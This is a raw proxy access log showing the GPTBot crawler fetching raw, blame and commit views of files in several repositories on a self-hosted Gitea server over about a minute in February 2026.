"/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good" [Client 74.7.227.38] [Length 20242] [Gzip 5.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" -[17/Feb/2026:14:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml" -[17/Feb/2026:14:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11155] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml" -[17/Feb/2026:14:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.gitignore" [Client 74.7.227.38] [Length 9900] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.gitignore" -[17/Feb/2026:14:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17347] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest" -[17/Feb/2026:14:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14349] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/my_database.db" -[17/Feb/2026:14:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:14:10:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:14:10:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/vite.config.ts" -[17/Feb/2026:14:10:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11240] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/vite.config.ts" -[17/Feb/2026:14:10:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2" [Client 74.7.227.38] [Length 21810] [Gzip 12.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2" -[17/Feb/2026:14:10:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/vite.config.ts" -[17/Feb/2026:14:10:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2" [Client 74.7.227.38] [Length 12530] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2" -[17/Feb/2026:14:10:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good" [Client 74.7.227.38] [Length 12246] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good" -[17/Feb/2026:14:10:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good" [Client 74.7.227.38] [Length 21658] [Gzip 12.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good" -[17/Feb/2026:14:10:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9911] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:10:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23043] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:10:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 9926] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:14:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py.claude" -[17/Feb/2026:14:10:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 10121] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js" -[17/Feb/2026:14:10:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/favicon.ico" [Client 74.7.227.38] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/favicon.ico" -[17/Feb/2026:14:10:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/database.py" -[17/Feb/2026:14:10:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/database.py" -[17/Feb/2026:14:10:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 10127] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py" -[17/Feb/2026:14:10:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:14:10:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 10129] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:14:10:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:14:10:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/models.py" -[17/Feb/2026:14:10:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js" -[17/Feb/2026:14:10:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" [Client 74.7.227.38] [Length 10106] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" -[17/Feb/2026:14:10:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43161] [Gzip 20.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/Project%20Planning-1.md" -[17/Feb/2026:14:10:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11960] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" -[17/Feb/2026:14:10:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/vite.config.ts" -[17/Feb/2026:14:10:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:10:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 210994] [Gzip 18.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:10:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 211029] [Gzip 18.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:10:23 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Services.tsx" -[17/Feb/2026:14:10:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/update_status.py" [Client 74.7.227.38] [Length 12475] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/update_status.py" -[17/Feb/2026:14:10:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/update_status.py" [Client 74.7.227.38] [Length 12475] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/update_status.py" -[17/Feb/2026:14:10:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/update_status.py" [Client 74.7.227.38] [Length 12473] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/update_status.py" -[17/Feb/2026:14:10:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10464] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/import%20sys.py" -[17/Feb/2026:14:10:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/labels" [Client 74.7.227.38] [Length 7626] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" -[17/Feb/2026:14:10:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/vite.config.ts" -[17/Feb/2026:14:10:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11236] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/vite.config.ts" -[17/Feb/2026:14:10:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/vite.config.ts" -[17/Feb/2026:14:10:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 10190] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:14:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 305108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:14:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 10220] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:14:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 322704] [Gzip 27.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:14:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 305108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:14:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/status.json" [Client 74.7.227.38] [Length 11014] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 